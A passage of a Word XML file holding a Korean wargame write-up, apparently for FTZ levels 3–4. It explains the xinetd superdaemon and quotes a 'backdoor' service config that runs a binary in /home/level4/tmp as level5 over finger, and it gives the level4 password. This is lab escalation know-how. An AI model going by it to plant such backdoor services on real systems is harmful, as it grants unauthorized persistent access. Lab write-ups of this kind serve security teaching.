      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00903DF4"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>실행</w:t>
      </w:r>
      <w:r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하는 코드의 시작</w:t>
      </w:r>
      <w:r w:rsidR="00903DF4"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>부분</w:t>
      </w:r>
      <w:r w:rsidR="00903DF4"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주소가 들어가지 않더라도 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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쉘</w:t>
      </w:r>
      <w:r w:rsidR="00903DF4"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>이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00903DF4"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실행됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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아래는</w:t>
      </w:r>
      <w:r w:rsidRPr="00903DF4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공격에 성공한 모습입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D21D86" w:rsidRDefault="00D21D86" w:rsidP="00903DF4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373EA4" w:rsidRDefault="001252FE" w:rsidP="00903DF4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>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6494926" cy="1419225"/>
            <wp:effectExtent l="19050" t="0" r="1124" b="0"/>
            <wp:docPr id="15" name="그림 14" descr="dsfsdfsd_3_2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fsdfsd_3_2_3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6222" cy="142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2FE" w:rsidRDefault="001252FE" w:rsidP="00903DF4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1252FE" w:rsidRDefault="001252FE" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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7D3AB8" w:rsidRDefault="007D3AB8" w:rsidP="00903DF4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3D4764" w:rsidRPr="009A134E" w:rsidRDefault="002E52F9" w:rsidP="003D4764">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="003D4764" w:rsidRPr="009A134E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 xml:space="preserve">evel4 </w:t>
      </w:r>
      <w:r w:rsidR="003D4764" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D4764" w:rsidRPr="009A134E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>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D4764" w:rsidRPr="009A134E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>xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D4764" w:rsidRPr="009A134E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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D4764" w:rsidRPr="009A134E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>백도어</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D4764" w:rsidRPr="009A134E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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D3AB8" w:rsidRDefault="002B7961" w:rsidP="002B7961">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B7961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>level4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B7961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 xml:space="preserve"> password : suck my brain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B7961" w:rsidRDefault="002B7961" w:rsidP="002B7961">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B7961" w:rsidRDefault="00EA5D23" w:rsidP="002B7961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>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6401901" cy="5915025"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="그림 15" descr="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1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0342" cy="592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0EC" w:rsidRDefault="000F60EC" w:rsidP="002B7961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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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이번에는</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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관한 문제입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="00430188">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00430188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>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00430188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>xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00430188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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00430188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>데몬이란</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00430188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>?=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00430188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리눅스에서</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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deamon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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이란 운영체제 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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실행중에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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상주하는 프로세스</w:t>
      </w:r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lastRenderedPageBreak/>
        <w:t>입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart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xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬은</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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여러가지</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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네트워크 서비스에 대한 요청을 받아서 실행시켜주는 슈퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬입니다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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네트워크</w:t>
      </w:r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서비스를 제공하는 방식에는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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두가지가</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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stand alone 방식이 있고, 슈퍼 데몬 방식이 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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stand alone 방식은 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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예를들어</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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telnetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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httpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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같은 각각의 네트워크 서비스 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬들이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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모두 따로따로 상주해 있는 형태입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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하지만</w:t>
      </w:r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사실 각 네트워크 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬들은</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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공통적인 부분이 많습니다. 소켓을 생성하여 bind하고 listening하는 부분과 accept하는 부분은 특히 모든 네트워크 서비스 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬들이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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공통적으로 가지고 있는 기능입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00430188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이런것들과</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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그외</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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여러가지</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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공통으로 실행되는 부분들을 각 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬들이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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따로따로 실행한다면 서버 자원의 낭비라고 할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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따라서</w:t>
      </w:r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모든 네트워크 서비스 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬들이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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공통적으로 가지고 있는 부분을 단 하나의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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슈퍼데몬이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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실행하고 있다가, 어떤 서비스에 대한 요청이 들어오면 그때서야 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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슈퍼데몬이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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그 서비스를 실행시켜주는 방식을 고안해냈습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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이게</w:t>
      </w:r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바로 슈퍼데몬 방식이고 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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사용하는 방식입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart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lastRenderedPageBreak/>
        <w:t>xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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사용하는 방법을 먼저 알아보겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xinetd.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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디렉터리에는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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데몬 방식을 사용할 서비스의 목록을 등록합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xientd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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파일은 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xientd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬의</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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동작에 대한 설정을 정의합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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현재</w:t>
      </w:r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문제에서 /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xinetd.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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디렉터리에는 여러 서비스가 등록되어 있습니다.</w:t>
      </w:r>
      <w:r w:rsidR="00E9739D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00430188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그중에서</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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대놓고 의심스러운 backdoor라는 서비스가 보입니다. 내용은 다음과 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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service finger   #서비스 이름</w:t>
      </w:r>
      <w:r w:rsidR="00E9739D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(</w:t>
      </w:r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/etc/services 파일에 있는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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서비스명으로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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선택하는것을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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권장</w:t>
      </w:r>
      <w:r w:rsidR="00E9739D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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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disable = no     #no는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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활성화, yes는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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비활성화</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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flags = REUSE  #서비스 포트가 사용중인 경우, 해당 포트의 재사용을 허가</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart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socket_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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= stream</w:t>
      </w:r>
      <w:r w:rsidR="00E9739D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 xml:space="preserve">     </w:t>
      </w:r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#TCP프로토콜을 선택</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00DC2DE1" w:rsidP="0043018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wait = no              </w:t>
      </w:r>
      <w:r w:rsidR="00430188"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#서비스 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00430188"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연결중</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00430188"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다른 요청이 들어오면 바로 응답, 동시에 다수 접속이 가능하다는 의미</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00DC2DE1" w:rsidP="0043018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user = level5       </w:t>
      </w:r>
      <w:r w:rsidR="00430188"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#해당 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00430188"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데몬이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00430188"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level5 계정의 권한으로 실행됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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server = /home/level4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/backdoor  #</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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에 의해 실행될 데몬 파일</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart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log_on_fa</w:t>
      </w:r>
      <w:r w:rsidR="00DC2DE1">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ilure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC2DE1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+= USERID    </w:t>
      </w:r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#접속 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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실패시</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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userid를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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로그에 기록</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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lastRenderedPageBreak/>
        <w:t>그리고</w:t>
      </w:r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/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xinetd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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의 내용은 다음과 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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defualts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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instances = 60                   #</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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의해 실행되는 서비스 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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데몬의</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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최대 동시접속자수</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart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log_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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= SYSLOG </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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authpriv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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#system log를 "보안 및 승인에 관한 메시지 등급"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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으로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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저장</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart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log_on_success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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= HOST PID #접속 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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성공시</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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IP와 PID를 로그에 저장</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart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log_on_failure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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= HOST          #접속 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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실패시</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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IP를 로그에 저장</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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cps = 25 30                        #동시접속이 25개가 되면 30초간 서비스 비활성화</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00E9739D" w:rsidRDefault="00430188" w:rsidP="00430188">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9739D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>=문제 풀이=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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337BEE" w:rsidRDefault="00430188" w:rsidP="0043018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/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xinetd.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/backdoor 에서 가장 중요한 내용을 해석하면 다음과 같습니다</w:t>
      </w:r>
      <w:r w:rsidR="00337BEE">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00337BEE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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00337BEE" w:rsidRDefault="00337BEE" w:rsidP="00337BEE">
      <w:pPr>
        <w:jc w:val="left"/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430188" w:rsidRPr="00430188" w:rsidRDefault="00337BEE" w:rsidP="00337BEE">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>level5</w:t>
      </w:r>
      <w:r w:rsidR="00430188"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권한으로</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00430188"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finger라는</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00430188"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서비스를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>이용</w:t>
      </w:r>
      <w:r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해</w:t>
      </w:r>
      <w:r w:rsidR="00430188"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/home/level4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00430188"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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00430188"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/backdoor 파일이 실행된다는 것입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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그렇다면</w:t>
      </w:r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먼저 cat /etc/services </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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finger 명령어로 finger 서비스가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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몇번</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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포트를 사용하는지 알아보면 79번 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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포트를 사용하는 것을 알 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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lastRenderedPageBreak/>
        <w:t>그런데</w:t>
      </w:r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/home/level4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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디렉터리에는 아무것도 없습니다.</w:t>
      </w:r>
    </w:p>
